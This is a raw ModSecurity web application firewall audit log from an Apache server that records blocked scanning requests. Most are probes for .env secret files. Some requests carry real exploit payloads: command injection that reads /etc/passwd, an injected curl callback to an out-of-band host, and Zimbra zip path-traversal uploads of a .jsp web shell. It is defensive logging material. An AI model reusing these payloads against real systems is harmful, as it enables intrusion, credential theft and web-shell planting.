REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749041683916067 801 (- - -) Stopwatch2: 1749041683916067 801; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34b75770-Z-- --f89dc740-A-- [04/Jun/2025:20:47:34 +0700] aEBOdthPZJx8OfNaLCogTQAAAMc 103.236.140.4 60522 103.236.140.4 8181 --f89dc740-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Accept-Charset: utf-8 --f89dc740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89dc740-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749044854864914 821 (- - -) Stopwatch2: 1749044854864914 821; combined=380, p1=340, p2=0, p3=0, p4=0, p5=40, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89dc740-Z-- --0e538655-A-- [04/Jun/2025:20:47:39 +0700] aEBOezNXNn6zAsHj7JDlAwAAAFE 103.236.140.4 60556 103.236.140.4 8181 --0e538655-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --0e538655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e538655-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749044859067644 746 (- - -) Stopwatch2: 1749044859067644 746; combined=305, p1=271, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e538655-Z-- --8e0f4f28-A-- [04/Jun/2025:21:13:18 +0700] aEBUfpLmnxTwEPX7IuaX1AAAAJg 103.236.140.4 32936 103.236.140.4 8181 --8e0f4f28-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 173783204 --8e0f4f28-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --8e0f4f28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e0f4f28-E-- --8e0f4f28-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749046398726484 3062 (- - -) Stopwatch2: 1749046398726484 3062; combined=1861, p1=526, p2=1292, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e0f4f28-Z-- --86241955-A-- [04/Jun/2025:21:38:15 +0700] aEBaV9hPZJx8OfNaLCowKQAAANM 103.236.140.4 59562 103.236.140.4 8181 --86241955-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.180.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.180.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --86241955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86241955-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749047895728459 845 (- - -) Stopwatch2: 1749047895728459 845; combined=353, p1=295, p2=0, p3=0, p4=0, p5=58, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86241955-Z-- --da522b1e-A-- [04/Jun/2025:21:47:26 +0700] aEBcfpLmnxTwEPX7Iuaf_wAAAIo 103.236.140.4 36302 103.236.140.4 8181 --da522b1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.7.2000 Accept-Charset: utf-8 --da522b1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da522b1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749048446804182 825 (- - -) Stopwatch2: 1749048446804182 825; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da522b1e-Z-- --79ca4d08-A-- [04/Jun/2025:22:22:27 +0700] aEBks1_DvM40jZomoktiMwAAAA8 103.236.140.4 38962 103.236.140.4 8181 --79ca4d08-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --79ca4d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79ca4d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749050547888581 929 (- - -) Stopwatch2: 1749050547888581 929; combined=381, p1=341, p2=0, p3=0, p4=0, p5=40, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79ca4d08-Z-- --d8b56c4a-A-- [04/Jun/2025:22:33:36 +0700] aEBnUDNXNn6zAsHj7JD1KwAAAFQ 103.236.140.4 39104 103.236.140.4 8181 --d8b56c4a-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d8b56c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8b56c4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749051216598119 849 (- - -) Stopwatch2: 1749051216598119 849; combined=408, p1=369, p2=0, p3=0, p4=0, p5=39, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8b56c4a-Z-- --59117d51-A-- [04/Jun/2025:22:45:19 +0700] aEBqD9hPZJx8OfNaLCozawAAANI 103.236.140.4 39398 103.236.140.4 8181 --59117d51-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.90.228.79 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --59117d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59117d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749051919476437 781 (- - -) Stopwatch2: 1749051919476437 781; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59117d51-Z-- --12378505-A-- [04/Jun/2025:22:52:35 +0700] aEBrw5LmnxTwEPX7Iuag5gAAAJI 103.236.140.4 39428 103.236.140.4 8181 --12378505-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15 Accept-Charset: utf-8 --12378505-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12378505-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749052355714356 851 (- - -) Stopwatch2: 1749052355714356 851; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12378505-Z-- --2c17956d-A-- [04/Jun/2025:22:52:52 +0700] aEBr1DNXNn6zAsHj7JD1NwAAAEA 103.236.140.4 39430 103.236.140.4 8181 --2c17956d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept-Charset: utf-8 --2c17956d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c17956d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749052372684640 854 (- - -) Stopwatch2: 1749052372684640 854; combined=377, p1=339, p2=0, p3=0, p4=0, p5=37, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c17956d-Z-- --9175d665-A-- [04/Jun/2025:23:17:17 +0700] aEBxjdhPZJx8OfNaLCozjwAAANc 103.236.140.4 39572 103.236.140.4 8181 --9175d665-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Python-urllib/2.5 Accept-Charset: utf-8 --9175d665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9175d665-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749053837543631 1275 (- - -) Stopwatch2: 1749053837543631 1275; combined=317, p1=280, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9175d665-Z-- --da482401-A-- [04/Jun/2025:23:20:30 +0700] aEByTthPZJx8OfNaLCozoQAAANI 103.236.140.4 39608 103.236.140.4 8181 --da482401-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --da482401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da482401-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749054030783221 827 (- - -) Stopwatch2: 1749054030783221 827; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da482401-Z-- --00774a4b-A-- [04/Jun/2025:23:56:13 +0700] aEB6rV_DvM40jZomoktiTgAAAAE 103.236.140.4 39834 103.236.140.4 8181 --00774a4b-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 170 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173729933 --00774a4b-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0us2vpgpeonc6qdbef08cijh999th7z8.oast.me`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --00774a4b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --00774a4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749056173136529 4292 (- - -) Stopwatch2: 1749056173136529 4292; combined=2326, p1=602, p2=1652, p3=19, p4=23, p5=30, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00774a4b-Z-- --a1b0fe28-A-- [04/Jun/2025:23:56:13 +0700] aEB6rTNXNn6zAsHj7JD1RAAAAEw 103.236.140.4 39844 103.236.140.4 8181 --a1b0fe28-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173596721 --a1b0fe28-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --a1b0fe28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1b0fe28-E-- --a1b0fe28-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749056173136962 5172 (- - -) Stopwatch2: 1749056173136962 5172; combined=3593, p1=432, p2=3126, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1b0fe28-Z-- --77728c74-A-- [04/Jun/2025:23:56:13 +0700] aEB6rdhPZJx8OfNaLCoz0gAAAMI 103.236.140.4 39840 103.236.140.4 8181 --77728c74-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 173596724 --77728c74-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --77728c74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77728c74-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749056173155108 4626 (- - -) Stopwatch2: 1749056173155108 4626; combined=3482, p1=468, p2=2982, p3=0, p4=0, p5=32, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77728c74-Z-- --82631c57-A-- [04/Jun/2025:23:57:54 +0700] aEB7EthPZJx8OfNaLCoz1gAAAMs 103.236.140.4 39866 103.236.140.4 8181 --82631c57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/67.0.3396.69 Mobile/16A366 Safari/604.1 Accept-Charset: utf-8 --82631c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82631c57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749056274701322 740 (- - -) Stopwatch2: 1749056274701322 740; combined=287, 